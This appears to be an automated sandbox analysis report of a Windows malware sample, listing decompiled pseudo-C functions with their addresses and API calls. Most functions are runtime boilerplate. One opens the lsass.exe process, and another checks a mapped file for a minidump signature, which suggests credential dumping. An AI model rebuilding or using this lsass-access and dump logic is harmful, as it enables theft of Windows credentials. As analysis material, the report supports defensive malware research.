						_t13 = MapViewOfFile( *_t10, 4, 0, 0, 0);
						( *__esi)[1] = _t13;
						if(_t13 == 0) {
							goto L6;
						} else {
							_t15 = ( *__esi)[1];
							if( *_t15 != 0x504d444d ||  *((intOrPtr*)(_t15 + 4)) != 0xa793) {
								goto L6;
							} else {
								_t19 = 1;
							}
						}
					}
				}
				return _t19;
			}










    0x00f61487
    0x00f61488
    0x00f6148a
    0x00f61496
    0x00f614a5
    0x00f614a7
    0x00f614ab
    0x00f614bf
    0x00f614c1
    0x00f614c5
    0x00f614f8
    0x00f614fa
    0x00f614c7
    0x00f614ce
    0x00f614d6
    0x00f614db
    0x00000000
    0x00f614dd
    0x00f614df
    0x00f614e8
    0x00000000
    0x00f614f5
    0x00f614f5
    0x00f614f5
    0x00f614e8
    0x00f614db
    0x00f614c5
    0x00f61502

    APIs
    • GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,00000008,00F6CD68,00F610E7,?,?,00F62C36,00000001,00000000), ref: 00F61498
    • GetProcAddress.KERNEL32(00000000,?,00F62C36,00000001,00000000), ref: 00F6149F
    • CreateFileMappingW.KERNEL32(C0000225,00000000,00000002,00000000,00000000,00000000,?,00F62C36,00000001,00000000), ref: 00F614B7
    • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00F62C36,00000001,00000000), ref: 00F614CE
      • Part of subcall function 00F61503: UnmapViewOfFile.KERNEL32(00000002,00000000,00F61141,?,00F62DAB), ref: 00F6150E
      • Part of subcall function 00F61503: CloseHandle.KERNEL32(?,00000000,00F61141,?,00F62DAB), ref: 00F6151B
    Strings
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    Function 00F642E9, Relevance: 12.1, APIs: 8, Instructions: 61
    C-Code - Quality: 100%
    			E00F642E9(LONG* _a4) {
				LONG* _t16;
				LONG* _t17;
				LONG* _t18;
				LONG* _t19;
				LONG* _t20;
				LONG* _t21;
				long* _t32;
				LONG* _t34;

				_t34 = _a4;
				if(_t34 == 0) {
					L18:
					return _t34;
				}
				InterlockedDecrement(_t34);
				_t16 = _t34[0x2c];
				if(_t16 != 0) {
					InterlockedDecrement(_t16);
				}
				_t17 = _t34[0x2e];
				if(_t17 != 0) {
					InterlockedDecrement(_t17);
				}
				_t18 = _t34[0x2d];
				if(_t18 != 0) {
					InterlockedDecrement(_t18);
				}
				_t19 = _t34[0x30];
				if(_t19 != 0) {
					InterlockedDecrement(_t19);
				}
				_t32 =  &(_t34[0x14]);
				_a4 = 6;
				do {
					if( *((intOrPtr*)(_t32 - 8)) != 0xf6b52c) {
						_t20 =  *_t32;
						if(_t20 != 0) {
							InterlockedDecrement(_t20);
						}
					}
					if( *((intOrPtr*)(_t32 - 4)) != 0) {
						_t21 = _t32[1];
						if(_t21 != 0) {
							InterlockedDecrement(_t21);
						}
					}
					_t32 =  &(_t32[4]);
					_t11 =  &_a4;
					 *_t11 = _a4 - 1;
				} while ( *_t11 != 0);
				InterlockedDecrement(_t34[0x35] + 0xb4);
				goto L18;
			}











    0x00f642ef
    0x00f642f4
    0x00f6437d
    0x00f64381
    0x00f64381
    0x00f64303
    0x00f64305
    0x00f6430d
    0x00f64310
    0x00f64310
    0x00f64312
    0x00f6431a
    0x00f6431d
    0x00f6431d
    0x00f6431f
    0x00f64327
    0x00f6432a
    0x00f6432a
    0x00f6432c
    0x00f64334
    0x00f64337
    0x00f64337
    0x00f64339
    0x00f6433c
    0x00f64343
    0x00f6434a
    0x00f6434c
    0x00f64350
    0x00f64353
    0x00f64353
    0x00f64350
    0x00f64359
    0x00f6435b
    0x00f64360
    0x00f64363
    0x00f64363
    0x00f64360
    0x00f64365
    0x00f64368
    0x00f64368
    0x00f64368
    0x00f64379
    0x00000000

    APIs
    • InterlockedDecrement.KERNEL32(?,-0000006C,?,00000000,?,00F644FB,-0000006C,-0000006C,?,?,00F64574,-0000006C,00F69E28,0000000C,00F637AD), ref: 00F64303
    • InterlockedDecrement.KERNEL32(?,?,00000000,?,00F644FB,-0000006C,-0000006C,?,?,00F64574,-0000006C,00F69E28,0000000C,00F637AD), ref: 00F64310
    • InterlockedDecrement.KERNEL32(?,?,00000000,?,00F644FB,-0000006C,-0000006C,?,?,00F64574,-0000006C,00F69E28,0000000C,00F637AD), ref: 00F6431D
    • InterlockedDecrement.KERNEL32(?,?,00000000,?,00F644FB,-0000006C,-0000006C,?,?,00F64574,-0000006C,00F69E28,0000000C,00F637AD), ref: 00F6432A
    • InterlockedDecrement.KERNEL32(?,?,00000000,?,00F644FB,-0000006C,-0000006C,?,?,00F64574,-0000006C,00F69E28,0000000C,00F637AD), ref: 00F64337
    • InterlockedDecrement.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,00F644FB,-0000006C,-0000006C,?,?,00F64574), ref: 00F64353
    • InterlockedDecrement.KERNEL32(00000000,?,?,?,?,?,?,?,00000000,?,00F644FB,-0000006C,-0000006C,?,?,00F64574), ref: 00F64363
    • InterlockedDecrement.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,00F644FB,-0000006C,-0000006C,?,?,00F64574), ref: 00F64379
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    Function 00F6425A, Relevance: 12.1, APIs: 8, Instructions: 58
    C-Code - Quality: 100%
    			E00F6425A(LONG* _a4) {
				LONG* _t15;
				LONG* _t16;
				LONG* _t17;
				LONG* _t18;
				LONG* _t19;
				LONG* _t20;
				LONG** _t30;
				LONG* _t31;

				_t31 = _a4;
				InterlockedIncrement(_t31);
				_t15 = _t31[0x2c];
				if(_t15 != 0) {
					InterlockedIncrement(_t15);
				}
				_t16 = _t31[0x2e];
				if(_t16 != 0) {
					InterlockedIncrement(_t16);
				}
				_t17 = _t31[0x2d];
				if(_t17 != 0) {
					InterlockedIncrement(_t17);
				}
				_t18 = _t31[0x30];
				if(_t18 != 0) {
					InterlockedIncrement(_t18);
				}
				_t6 =  &(_t31[0x14]); // 0x50
				_t30 = _t6;
				_a4 = 6;
				do {
					if( *((intOrPtr*)(_t30 - 8)) != 0xf6b52c) {
						_t19 =  *_t30;
						if(_t19 != 0) {
							InterlockedIncrement(_t19);
						}
					}
					if( *((intOrPtr*)(_t30 - 4)) != 0) {
						_t20 = _t30[1];
						if(_t20 != 0) {
							InterlockedIncrement(_t20);
						}
					}
					_t30 =  &(_t30[4]);
					_t11 =  &_a4;
					 *_t11 = _a4 - 1;
				} while ( *_t11 != 0);
				return InterlockedIncrement(_t31[0x35] + 0xb4);
			}











    0x00f64268
    0x00f6426c
    0x00f6426e
    0x00f64276
    0x00f64279
    0x00f64279
    0x00f6427b
    0x00f64283
    0x00f64286
    0x00f64286
    0x00f64288
    0x00f64290
    0x00f64293
    0x00f64293
    0x00f64295
    0x00f6429d
    0x00f642a0
    0x00f642a0
    0x00f642a2
    0x00f642a2
    0x00f642a5
    0x00f642ac
    0x00f642b3
    0x00f642b5
    0x00f642b9
    0x00f642bc
    0x00f642bc
    0x00f642b9
    0x00f642c2
    0x00f642c4
    0x00f642c9
    0x00f642cc
    0x00f642cc
    0x00f642c9
    0x00f642ce
    0x00f642d1
    0x00f642d1
    0x00f642d1
    0x00f642e8

    APIs
    • InterlockedIncrement.KERNEL32(00000000,00000001,?,?,?,00F6469F,?), ref: 00F6426C
    • InterlockedIncrement.KERNEL32(?,?,?,00F6469F,?), ref: 00F64279
    • InterlockedIncrement.KERNEL32(?,?,?,00F6469F,?), ref: 00F64286
    • InterlockedIncrement.KERNEL32(?,?,?,00F6469F,?), ref: 00F64293
    • InterlockedIncrement.KERNEL32(?,?,?,00F6469F,?), ref: 00F642A0
    • InterlockedIncrement.KERNEL32(?,?,?,00F6469F,?), ref: 00F642BC
    • InterlockedIncrement.KERNEL32(?,?,?,00F6469F,?), ref: 00F642CC
    • InterlockedIncrement.KERNEL32(?,?,?,00F6469F,?), ref: 00F642E2
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    Function 00F62B7D, Relevance: 7.7, APIs: 5, Instructions: 178
    C-Code - Quality: 67%
    			E00F62B7D() {
				long _v4;
				struct _SECURITY_ATTRIBUTES* _v8;
				struct _SECURITY_ATTRIBUTES* _v12;
				struct _SECURITY_ATTRIBUTES* _v16;
				signed int _v24;
				void* __edi;
				void* __esi;
				intOrPtr* _t27;
				WCHAR* _t29;
				signed int _t31;
				void* _t34;
				signed int _t37;
				signed int _t38;
				signed int* _t39;
				intOrPtr _t41;
				signed int _t42;
				signed int _t46;
				intOrPtr _t47;
				signed int _t48;
				intOrPtr _t49;
				signed int _t57;
				signed int _t60;
				signed int _t69;
				signed int _t79;
				long _t82;
				intOrPtr _t83;
				signed int _t85;
				intOrPtr _t94;

				asm("sbb esi, esi");
				_t82 = (_t79 & 0xfffff400) + 0x00001000 | 0x00000010;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_t94 =  *0xf6cd68; // 0x0
				if(_t94 == 0) {
					_t27 =  *0xf6cec0; // 0x0
					_v8 = 0xc0000225;
					if( *_t27() >= 0) {
						_t29 =  *0xf6cd78; // 0x0
						if(_t29 == 0) {
							_t31 = E00F61982( &_v4);
							__eflags = _t31;
							if(_t31 == 0) {
								goto L28;
							} else {
								_t34 = OpenProcess(_t82, 0, _v4);
								_t85 = 1;
								__eflags = 1;
								goto L6;
							}
						} else {
							_push(2);
							_pop(1);
							_t85 = 1;
							_t34 = CreateFileW(_t29, 0x80000000, 1, 0, 3, 0, 0);
							L6:
							_v12 = _t34;
							if(_t34 == 0 || _t34 == 0xffffffff) {
								L28:
								_t83 =  *0xf6cd68; // 0x0
								 *0xf6cd68 = E00F6110E(_t83);
								CloseHandle(_v12);
							} else {
								_push(_t34);
								_push(1);
								if(E00F61041(0xf6cd68) == 0) {
									goto L28;
								} else {
									if(1 != 2) {
										_t37 = GetCurrentProcess();
										__imp__IsWow64Process(_t37,  &_v16);
										__eflags = _t37;
										if(_t37 == 0) {
											L19:
											_t38 =  *0xf6cfcc; // 0x0
											_t57 =  *0xf6cfd0; // 0x0
											 *0xf6cd70 = _t38;
											_t39 =  *0xf6cfd4; // 0x0
											 *0xf6cd6c = _t57;
											 *0xf6cd74 = _t39;
											goto L20;
										} else {
											__eflags = _v24;
											if(_v24 != 0) {
												goto L28;
											} else {
												goto L19;
											}
										}
									} else {
										_t49 =  *0xf6cd68; // 0x0
										_t39 = E00F61526( *((intOrPtr*)( *((intOrPtr*)(_t49 + 4)))), 7);
										if(_t39 == 0) {
											_t57 =  *0xf6cd6c; // 0x0
											_v16 = _t85;
											goto L20;
										} else {
											_t57 = _t39[2];
											 *0xf6cd6c = _t57;
											 *0xf6cd70 = _t39[3];
											 *0xf6cd74 = _t39[4];
											_t69 =  *0xf6cfd0; // 0x0
											if(_t57 == _t69 || _t69 >= 6 && _t57 >= 6) {
												_v16 = 0;
												__eflags =  *_t39;
												_v16 = 0 |  *_t39 != 0x00000000;
												L20:
												__eflags = _v24;
												if(_v24 != 0) {
													goto L28;
												} else {
													__eflags =  *0xf6cd74 - 0x1f40;
													asm("sbb eax, eax");
													 *0xf6cf68 =  &(_t39[0]);
													__eflags = _t57 - 6;
													if(_t57 >= 6) {
														L23:
														 *0xf6cf28 = _t85;
													} else {
														__eflags =  *0xf6cd70 - 2;
														 *0xf6cf28 = 0;
														if( *0xf6cd70 < 2) {
															goto L23;
														}
													}
													_t41 =  *0xf6cd68; // 0x0
													_t42 = E00F619EE(_t41, E00F62DC6, 0);
													__eflags = _t42;
													if(_t42 < 0) {
														goto L28;
													} else {
														__eflags =  *0xf6bba0; // 0x0
														if(__eflags == 0) {
															goto L28;
														} else {
															__eflags =  *0xf6cd74 - 0xece;
															_t60 = 7;
															asm("sbb eax, eax");
															memcpy(0xf6cfb0, 0xf6bb8c, _t60 << 2);
															_t46 = E00F634D4(0xf6cd68, 0xf6bb8c, 0xf6bd18, 6, 0xf6cd7c,  !_t42 & 0x00f6cd80, 0);
															__eflags = _t46;
															if(_t46 == 0) {
																goto L28;
															} else {
																_t47 =  *0xf6cec0; // 0x0
																_t48 =  *((intOrPtr*)(_t47 + 8))(0xf6cd68, 0xf6bb8c);
																_v16 = _t48;
																__eflags = _t48;
																if(_t48 < 0) {
																	goto L28;
																}
															}
														}
													}
												}
											} else {
												_v16 = _t85;
												goto L28;
											}
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}































    0x00f62b8c
    0x00f62b9a
    0x00f62b9e
    0x00f62ba2
    0x00f62ba6
    0x00f62baa
    0x00f62bb0
    0x00f62bb6
    0x00f62bbb
    0x00f62bc7
    0x00f62bcd
    0x00f62bd4
    0x00f62bf8
    0x00f62bfe
    0x00f62c00
    0x00000000
    0x00f62c06
    0x00f62c0c
    0x00f62c14
    0x00f62c14
    0x00000000
    0x00f62c14
    0x00f62bd6
    0x00f62bd6
    0x00f62bd8
    0x00f62be0
    0x00f62be8
    0x00f62c15
    0x00f62c15
    0x00f62c1b
    0x00f62da0
    0x00f62da0
    0x00f62daf
    0x00f62db4
    0x00f62c2a
    0x00f62c2a
    0x00f62c2b
    0x00f62c3a
    0x00000000
    0x00f62c40
    0x00f62c43
    0x00f62cb6
    0x00f62cbd
    0x00f62cc3
    0x00f62cc5
    0x00f62cd1
    0x00f62cd1
    0x00f62cd6
    0x00f62cdc
    0x00f62ce1
    0x00f62ce6
    0x00f62cec
    0x00000000
    0x00f62cc7
    0x00f62cc7
    0x00f62ccb
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00f62ccb
    0x00f62c45
    0x00f62c45
    0x00f62c51
    0x00f62c59
    0x00f62ca5
    0x00f62cab
    0x00000000
    0x00f62c5b
    0x00f62c5b
    0x00f62c5e
    0x00f62c67
    0x00f62c70
    0x00f62c76
    0x00f62c7e
    0x00f62c95
    0x00f62c99
    0x00f62c9f
    0x00f62cf1
    0x00f62cf1
    0x00f62cf5
    0x00000000
    0x00f62cfb
    0x00f62cfb
    0x00f62d05
    0x00f62d08
    0x00f62d0d
    0x00f62d10
    0x00f62d21
    0x00f62d21
    0x00f62d12
    0x00f62d12
    0x00f62d19
    0x00f62d1f
    0x00000000
    0x00000000
    0x00f62d1f
    0x00f62d27
    0x00f62d32
    0x00f62d39
    0x00f62d3b
    0x00000000
    0x00f62d3d
    0x00f62d3d
    0x00f62d43
    0x00000000
    0x00f62d45
    0x00f62d45
    0x00f62d51
    0x00f62d52
    0x00f62d69
    0x00f62d80
    0x00f62d88
    0x00f62d8a
    0x00000000
    0x00f62d8c
    0x00f62d8c
    0x00f62d93
    0x00f62d98
    0x00f62d9c
    0x00f62d9e
    0x00000000
    0x00000000
    0x00f62d9e
    0x00f62d8a
    0x00f62d43
    0x00f62d3b
    0x00f62c8a
    0x00f62c8a
    0x00000000
    0x00f62c8a
    0x00f62c7e
    0x00f62c59
    0x00f62c43
    0x00f62c3a
    0x00f62c1b
    0x00f62bd4
    0x00f62bc7
    0x00f62dc5

    APIs
    • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00F62BE8
      • Part of subcall function 00F61982: RtlInitUnicodeString.NTDLL(?,lsass.exe), ref: 00F619A4
      • Part of subcall function 00F61982: LocalFree.KERNEL32(?,?,?), ref: 00F619DF
    • OpenProcess.KERNEL32(00F6BD30,00000000,?), ref: 00F62C0C
      • Part of subcall function 00F61041: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,00000008,00000001,00000000,00000001,?,00F62C36,00000001,00000000), ref: 00F6105E
      • Part of subcall function 00F61041: GetProcAddress.KERNEL32(00000000,?,00F62C36,00000001,00000000), ref: 00F61067
      • Part of subcall function 00F61041: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,00000004,?,00F62C36,00000001,00000000), ref: 00F6109A
      • Part of subcall function 00F61041: GetProcAddress.KERNEL32(00000000,?,00F62C36,00000001,00000000), ref: 00F6109D
      • Part of subcall function 00F61041: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,00000004,?,00F62C36,00000001,00000000), ref: 00F610C9
      • Part of subcall function 00F61041: GetProcAddress.KERNEL32(00000000,?,00F62C36,00000001,00000000), ref: 00F610CC
      • Part of subcall function 00F61041: LocalFree.KERNEL32(00F6CD68,?,00F62C36,00000001,00000000), ref: 00F610FF
    • GetCurrentProcess.KERNEL32(?), ref: 00F62CB6
    • IsWow64Process.KERNEL32(00000000), ref: 00F62CBD
      • Part of subcall function 00F619EE: RtlInitUnicodeString.NTDLL(?,00000000), ref: 00F61AC6
      • Part of subcall function 00F619EE: LocalFree.KERNEL32(00000000), ref: 00F61ADE
      • Part of subcall function 00F619EE: _wcsrchr.LIBCMT ref: 00F61B4E
      • Part of subcall function 00F619EE: RtlInitUnicodeString.NTDLL(?,-00000002), ref: 00F61B5D
      • Part of subcall function 00F619EE: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,?), ref: 00F61C39
      • Part of subcall function 00F619EE: GetProcAddress.KERNEL32(00000000), ref: 00F61C40
      • Part of subcall function 00F619EE: LocalFree.KERNEL32(?), ref: 00F61C88
      • Part of subcall function 00F6110E: LocalFree.KERNEL32(?,?,00F62DAB), ref: 00F6112C
      • Part of subcall function 00F6110E: LocalFree.KERNEL32(00000000,?,00F62DAB), ref: 00F6112F
    • CloseHandle.KERNEL32(?), ref: 00F62DB4
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    Function 00F65E67, Relevance: 7.6, APIs: 5, Instructions: 92
    C-Code - Quality: 79%
    			E00F65E67(void* __ecx, void* __edx, intOrPtr* _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				void* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t27;
				intOrPtr _t33;
				int _t37;
				void* _t40;
				short* _t41;
				short* _t47;
				void* _t48;
				void* _t54;
				int _t56;
				void* _t57;
				void* _t60;
				signed int _t61;
				short* _t62;

				_t54 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t27 =  *0xf6b940; // 0xbb40e64e
				_v8 = _t27 ^ _t61;
				_t47 = 0;
				_v12 = 0;
				if(_a24 == 0) {
					_a24 =  *((intOrPtr*)( *_a4 + 4));
				}
				_t56 = MultiByteToWideChar(_a24, 1 + (0 | _a28 != _t47) * 8, _a12, _a16, _t47, _t47);
				if(_t56 != _t47) {
					if(__eflags > 0) {
						__eflags = _t56 - 0x7ffffff0;
						if(_t56 <= 0x7ffffff0) {
							_t16 = _t56 + 8; // 0x8
							_t40 = _t56 + _t16;
							__eflags = _t40 - 0x400;
							if(_t40 > 0x400) {
								_t41 = E00F677DC(_t54, _t56, MultiByteToWideChar, _t40);
								__eflags = _t41 - _t47;
								if(_t41 != _t47) {
									 *_t41 = 0xdddd;
									goto L11;
								}
							} else {
								E00F67870(_t40);
								_t41 = _t62;
								__eflags = _t41 - _t47;
								if(_t41 != _t47) {
									 *_t41 = 0xcccc;
									L11:
									_t41 =  &(_t41[4]);
									__eflags = _t41;
								}
							}
							_t47 = _t41;
						}
					}
					__eflags = _t47;
					if(_t47 == 0) {
						goto L3;
					} else {
						E00F65BA0(_t47, 0, _t56 + _t56);
						_t37 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t47, _t56);
						__eflags = _t37;
						if(_t37 != 0) {
							_v12 = GetStringTypeW(_a8, _t47, _t37, _a20);
						}
						E00F65C1A(_t47);
						_t33 = _v12;
					}
				} else {
					L3:
					_t33 = 0;
				}
				_pop(_t57);
				_pop(_t60);
				_pop(_t48);
				return E00F65F8E(_t33, _t48, _v8 ^ _t61, _t54, _t57, _t60);
			}






















    0x00f65e67
    0x00f65e6c
    0x00f65e6d
    0x00f65e6e
    0x00f65e75
    0x00f65e79
    0x00f65e7d
    0x00f65e83
    0x00f65e8d
    0x00f65e8d
    0x00f65eb3
    0x00f65eb7
    0x00f65ebd
    0x00f65ebf
    0x00f65ec5
    0x00f65ec7
    0x00f65ec7
    0x00f65ecb
    0x00f65ed0
    0x00f65ee6
    0x00f65eec
    0x00f65eee
    0x00f65ef0
    0x00000000
    0x00f65ef0
    0x00f65ed2
    0x00f65ed2
    0x00f65ed7
    0x00f65ed9
    0x00f65edb
    0x00f65edd
    0x00f65ef6
    0x00f65ef6
    0x00f65ef6
    0x00f65ef6
    0x00f65edb
    0x00f65ef9
    0x00f65ef9
    0x00f65ec5
    0x00f65efb
    0x00f65efd
    0x00000000
    0x00f65eff
    0x00f65f06
    0x00f65f1b
    0x00f65f1d
    0x00f65f1f
    0x00f65f2f
    0x00f65f2f
    0x00f65f33
    0x00f65f38
    0x00f65f3b
    0x00f65eb9
    0x00f65eb9
    0x00f65eb9
    0x00f65eb9
    0x00f65f3f
    0x00f65f40
    0x00f65f41
    0x00f65f4d

    APIs
    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,?,?,?,?,00F65F7C,?,00000000,?), ref: 00F65EB1
    • __alloca_probe_16.NTDLLP ref: 00F65ED2
      • Part of subcall function 00F677DC: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,00F66195,00000000,00000001,00000000,?,00F660A2,00000018,00F69EB8,0000000C,00F66132), ref: 00F67821
    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00F65F1B
    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00F65F29
    • __freea.LIBCMT ref: 00F65F33
      • Part of subcall function 00F65F8E: IsDebuggerPresent.KERNEL32 ref: 00F67957
      • Part of subcall function 00F65F8E: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00F6796C
      • Part of subcall function 00F65F8E: UnhandledExceptionFilter.KERNEL32(00F698EC), ref: 00F67977
      • Part of subcall function 00F65F8E: GetCurrentProcess.KERNEL32(C0000409), ref: 00F67993
      • Part of subcall function 00F65F8E: TerminateProcess.KERNEL32(00000000), ref: 00F6799A
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    Function 00F65AFF, Relevance: 7.6, APIs: 5, Instructions: 54
    C-Code - Quality: 100%
    			E00F65AFF() {
				struct _FILETIME _v12;
				signed int _v16;
				union _LARGE_INTEGER _v20;
				signed int _t14;
				signed int _t16;
				signed int _t17;
				signed int _t18;
				signed int _t22;
				signed int _t25;
				signed int _t34;

				_t14 =  *0xf6b940; // 0xbb40e64e
				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
				_v12.dwHighDateTime = _v12.dwHighDateTime & 0x00000000;
				if(_t14 == 0xbb40e64e || (0xffff0000 & _t14) == 0) {
					GetSystemTimeAsFileTime( &_v12);
					_t16 = GetCurrentProcessId();
					_t17 = GetCurrentThreadId();
					_t18 = GetTickCount();
					QueryPerformanceCounter( &_v20);
					_t22 = _v16 ^ _v20.LowPart;
					_t34 = _v12.dwHighDateTime ^ _v12.dwLowDateTime ^ _t16 ^ _t17 ^ _t18 ^ _t22;
					if(_t34 != 0xbb40e64e) {
						if((0xffff0000 & _t34) == 0) {
							_t22 = (_t34 | 0x00004711) << 0x10;
							_t34 = _t34 | _t22;
						}
					} else {
						_t34 = 0xbb40e64f;
					}
					 *0xf6b940 = _t34;
					 *0xf6b944 =  !_t34;
					return _t22;
				} else {
					_t25 =  !_t14;
					 *0xf6b944 = _t25;
					return _t25;
				}
			}













    0x00f65b07
    0x00f65b0c
    0x00f65b10
    0x00f65b22
    0x00f65b36
    0x00f65b42
    0x00f65b4a
    0x00f65b52
    0x00f65b5e
    0x00f65b67
    0x00f65b6a
    0x00f65b6e
    0x00f65b79
    0x00f65b82
    0x00f65b85
    0x00f65b85
    0x00f65b70
    0x00f65b70
    0x00f65b70
    0x00f65b87
    0x00f65b8f
    0x00000000
    0x00f65b28
    0x00f65b28
    0x00f65b2a
    0x00000000
    0x00f65b2a

    APIs
    • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00F65B36
    • GetCurrentProcessId.KERNEL32 ref: 00F65B42
    • GetCurrentThreadId.KERNEL32 ref: 00F65B4A
    • GetTickCount.KERNEL32 ref: 00F65B52
    • QueryPerformanceCounter.KERNEL32(?), ref: 00F65B5E
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    Function 00F6555B, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71
    C-Code - Quality: 95%
    			E00F6555B() {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __ecx;
				WCHAR* _t14;
				signed int _t17;
				signed int _t18;
				signed int _t28;
				char _t35;
				WCHAR* _t42;
				signed int _t47;

				_push(_t31);
				 *0xf6c868 = 0;
				GetModuleFileNameW(0, 0xf6c660, 0x104);
				_t14 =  *0xf6ceb8; // 0x29176e
				 *0xf6c024 = 0xf6c660;
				if(_t14 == 0) {
					L2:
					_t42 = 0xf6c660;
				} else {
					_t42 = _t14;
					if( *_t14 == 0) {
						goto L2;
					}
				}
				_t17 = E00F65405(_t42,  &_v12, 0, 0,  &_v8);
				_t28 = _v8;
				if(_t28 >= 0x3fffffff) {
					L8:
					_t18 = _t17 | 0xffffffff;
				} else {
					_t35 = _v12;
					if(_t35 >= 0x7fffffff) {
						goto L8;
					} else {
						_t17 = _t35 + _t28 * 2 + _t35 + _t28 * 2;
						if(_t17 < _t35 + _t35) {
							goto L8;
						} else {
							_t17 = E00F66184(_t17);
							_t47 = _t17;
							if(_t47 == 0) {
								goto L8;
							} else {
								E00F65405(_t42,  &_v12, _t47 + _t28 * 4, _t47,  &_v8);
								 *0xf6c004 = _v8 - 1;
								 *0xf6c00c = _t47;
								_t18 = 0;
							}
						}
					}
				}
				return _t18;
			}














    0x00f65561
    0x00f65575
    0x00f6557b
    0x00f65581
    0x00f65586
    0x00f6558e
    0x00f65597
    0x00f65597
    0x00f65590
    0x00f65590
    0x00f65595
    0x00000000
    0x00000000
    0x00f65595
    0x00f655a5
    0x00f655aa
    0x00f655b5
    0x00f65601
    0x00f65601
    0x00f655b7
    0x00f655b7
    0x00f655c0
    0x00000000
    0x00f655c2
    0x00f655c5
    0x00f655cb
    0x00000000
    0x00f655cd
    0x00f655ce
    0x00f655d3
    0x00f655d8
    0x00000000
    0x00f655da
    0x00f655e7
    0x00f655f1
    0x00f655f7
    0x00f655fd
    0x00f655fd
    0x00f655d8
    0x00f655cb
    0x00f655c0
    0x00f65608

    APIs
    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmp,00000104), ref: 00F6557B
    • _wparse_cmdline.LIBCMT ref: 00F655A5
      • Part of subcall function 00F66184: Sleep.KERNEL32(00000000,00000001,00000000,?,00F660A2,00000018,00F69EB8,0000000C,00F66132,00000000,?,?,00F64660,0000000D), ref: 00F661A5
    • _wparse_cmdline.LIBCMT ref: 00F655E7
